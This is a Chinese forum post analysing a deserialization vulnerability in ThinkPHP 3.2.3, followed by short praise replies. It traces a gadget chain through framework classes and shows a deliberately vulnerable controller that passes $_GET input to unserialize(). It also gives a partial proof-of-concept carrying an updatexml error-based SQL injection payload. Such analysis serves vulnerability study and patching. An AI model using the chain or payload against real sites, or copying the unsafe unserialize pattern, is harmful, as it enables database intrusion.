搜索

查看: 3217|回复: 11

[PHP] Thinkphp3.2.3反序列化漏洞实例分析

[复制链接]
发表于 2023-5-4 17:04:33 | 显示全部楼层 |阅读模式
Editor 2023-5-4 17:04:33 3217 11 看全部
目录
  • 前言
  • 魔术方法
  • 复现
  • 结语
    前言
    ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。随着框架代码量的增加,一些潜在的威胁也逐渐暴露,本文给大家带来的是对Thinkphp3.2.3版本框架里面的反序列化漏洞进行分析,浅谈原理以及如何应用。

    魔术方法
    因为之前已经讲过了,这里就简单提一下,以下面这个魔术方法为例:
    _destruct
    该方法的作用是,某个对象的所有引用都被删除或者当对象被显式销毁时执行。例如下面代码:

    执行后会发现调用了魔术方法,我们要想办法来寻找代码之间的关系来构造 反序列化链,常见魔术方法如下:

    2023022408303007.jpg

    Thinkphp3.2.3反序列化漏洞实例分析4644 作者:Editor 帖子ID:2941 论坛知鸟论坛_zn60.com


    了解完魔术方法如何触发后便开始我们TP3反序列化漏洞的学习之旅。

    复现
    这里我是用小皮面板搭建好环境后开始我们的分析,下面是主界面:

    2023022408303008.jpg

    Thinkphp3.2.3反序列化漏洞实例分析302 作者:Editor 帖子ID:2941 论坛知鸟论坛_zn60.com


    需要在控制器IndexController.class.php 处写入:
    public function index(){
        unserialize(base64_decode($_GET[1]));
    }
    首先走到Library/Think/Image/Driver/Imagick.class.php ,代码如下:
    public function __destruct()
        {
            empty($this->img) || $this->img->destroy();
        }
    }
    这里有一个可控的变量img,因为该变量走向了destory(),于是我们寻找一下:
    Library/Think/Session/Driver/Memcache.class.php ,该处有个一样的方法:
    public function destroy($sessID)
        {
            return $this->handle->delete($this->sessionName . $sessID);
        }
    我们会发现handle和sessionName参数是可控,因为走向了delete函数,于是继续跟进寻找delete,在Mode/Lite/Model.class.php 处:
       public function delete($options = array())
        {
            $pk = $this->getPk();
            if (empty($options) && empty($this->options['where'])) {
                // 如果删除条件为空 则删除当前数据对象所对应的记录
                if (!empty($this->data) && isset($this->data[$pk])) {
                    return $this->delete($this->data[$pk]);
                } else {
                    return false;
                }
            }
            if (is_numeric($options) || is_string($options)) {
                // 根据主键删除记录
                if (strpos($options, ',')) {
                    $where[$pk] = array('IN', $options);
                } else {
                    $where[$pk] = $options;
                }
                $options          = array();
                $options['where'] = $where;
            }
            // 根据复合主键删除记录
            if (is_array($options) && (count($options) > 0) && is_array($pk)) {
                $count = 0;
                foreach (array_keys($options) as $key) {
                    if (is_int($key)) {
                        $count++;
                    }
                }
                if (count($pk) == $count) {
                    $i = 0;
                    foreach ($pk as $field) {
                        $where[$field] = $options[$i];
                        unset($options[$i++]);
                    }
                    $options['where'] = $where;
                } else {
                    return false;
                }
            }
            // 分析表达式
            $options = $this->_parseOptions($options);
            if (empty($options['where'])) {
                // 如果条件为空 不进行删除操作 除非设置 1=1
                return false;
            }
            if (is_array($options['where']) && isset($options['where'][$pk])) {
                $pkValue = $options['where'][$pk];
            }
            if (false === $this->_before_delete($options)) {
                return false;
            }
            $result = $this->db->delete($options);                //数据库驱动类中的delete()
            if (false !== $result && is_numeric($result)) {
                $data = array();
                if (isset($pkValue)) {
                    $data[$pk] = $pkValue;
                }
                $this->_after_delete($data, $options);
            }
            // 返回删除记录个数
            return $result;
        }
    这里比较复杂,需要分析一下,pk,pk,pk,data,$options参数都是可控的,第二次调用该函数后是调用db(Library/Think/Db/Driver.class.php )里面的函数,进去看一下:
    $table = $this->parseTable($options['table']);
    $sql   = 'DELETE FROM ' . $table;
    return $this->execute($sql, !empty($options['fetch_sql']) ? true : false);
    这里只贴了比较关键的代码,看到table经过parseTable处理之后进了sql语句,跟进了发现没有过滤什么,直接返回了数据,最后调用了execute,我们分析其代码:
    public function execute($str,$fetchSql=false) {
            $this->initConnect(true);
            if ( !$this->_linkID ) return false;
            $this->queryStr = $str;
            if(!empty($this->bind)){
                $that   =   $this;
                $this->queryStr =   strtr($this->queryStr,array_map(function($val) use($that){ return '''.$that->escapeString($val).'''; },$this->bind));
            }
            if($fetchSql){
                return $this->queryStr;
            }
    看到第二行是一个初始化连接的代码,我们跟进到最后发现:
    public function connect($config = '', $linkNum = 0, $autoConnection = false)
        {
            if (!isset($this->linkID[$linkNum])) {
                if (empty($config)) {
                    $config = $this->config;
                }
                try {
                    if (empty($config['dsn'])) {
                        $config['dsn'] = $this->parseDsn($config);
                    }
                    if (version_compare(PHP_VERSION, '5.3.6', 'options[PDO::ATTR_EMULATE_PREPARES] = false;
                    }
                    $this->linkID[$linkNum] = new PDO($config['dsn'], $config['username'], $config['password'], $this->options);
                } catch (\PDOException $e) {
                    if ($autoConnection) {
                        trace($e->getMessage(), '', 'ERR');
                        return $this->connect($autoConnection, $linkNum);
                    } elseif ($config['debug']) {
                        E($e->getMessage());
                    }
                }
            }
            return $this->linkID[$linkNum];
        }
    可以通过里面的相应代码:
    $this->config
    建立数据库连接,整个的POP链跟进顺序如下:
    __destruct()->destroy()->delete()->Driver::delete()->Driver::execute()->Driver::initConnect()->Driver::connect()->
    因为构造poc较长,这里只贴关键处,有兴趣的小伙伴可以自行去构造:
      public function __construct(){
                $this->db = new Mysql();
                $this->options['where'] = '';
                $this->pk = 'id';
                $this->data[$this->pk] = array(
                    "table" => "name where 1=updatexml(1,user(),1)#",
                    "where" => "1=1"
                ); }
    生成后传入payload即可实现错报注入,体现在payload里就是table这个语句,经过一串的操作使之与数据库连接来执行sql语句:

    2023022408303009.jpg

    Thinkphp3.2.3反序列化漏洞实例分析8390 作者:Editor 帖子ID:2941 论坛知鸟论坛_zn60.com


    结语
    给大家带来了tp3的反序列化漏洞分析,主要还是要理清各个链的关系以及如何让它们联系起来,有兴趣的小伙伴可以自己去搭建尝试,喜欢本文的小伙伴希望可以一键三连支持一下。
    以上就是Thinkphp3.2.3反序列化漏洞实例分析的详细内容,更多关于Thinkphp 反序列化漏洞的资料请关注知鸟论坛其它相关文章!
  • 发表于 2023-6-28 22:22:58 | 显示全部楼层
    123456823 2023-6-28 22:22:58 看全部
    这东西我收了!谢谢楼主!知鸟论坛真好!
    发表于 2023-6-29 01:32:20 | 显示全部楼层
    123456819 2023-6-29 01:32:20 看全部
    感谢楼主的无私分享!要想知鸟论坛好 就靠你我他
    发表于 2023-6-29 10:04:04 | 显示全部楼层
    六翼天使494 2023-6-29 10:04:04 看全部
    楼主太厉害了!楼主,I*老*虎*U!我觉得知鸟论坛真是个好地方!
    发表于 2023-6-29 15:21:52 | 显示全部楼层
    123456868 2023-6-29 15:21:52 看全部
    既然你诚信诚意的推荐了,那我就勉为其难的看看吧!知鸟论坛不走平凡路。
    发表于 2023-6-29 16:58:15 | 显示全部楼层
    尘埃416 2023-6-29 16:58:15 看全部
    既然你诚信诚意的推荐了,那我就勉为其难的看看吧!知鸟论坛不走平凡路。
    发表于 2023-6-29 21:29:49 | 显示全部楼层
    123456825 2023-6-29 21:29:49 看全部
    论坛不能没有像楼主这样的人才啊!我会一直支持知鸟论坛。
    发表于 2023-6-29 22:26:43 | 显示全部楼层
    素色流年783 2023-6-29 22:26:43 看全部
    论坛不能没有像楼主这样的人才啊!我会一直支持知鸟论坛。
    发表于 2023-6-30 08:28:39 | 显示全部楼层
    冀苍鸾 2023-6-30 08:28:39 看全部
    既然你诚信诚意的推荐了,那我就勉为其难的看看吧!知鸟论坛不走平凡路。
    发表于 2023-6-30 09:46:53 | 显示全部楼层
    李志敏 2023-6-30 09:46:53 看全部
    楼主,我太崇拜你了!我想我是一天也不能离开知鸟论坛
    • 您可能感兴趣
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则 返回列表

    RSS订阅| 小黑屋| 知鸟论坛 |网站地图
    本站资源来自互联网用户收集发布,如有侵权请邮件联系处理。 联系邮箱E-mail:zniao@foxmail.com
    快速回复 返回顶部 返回列表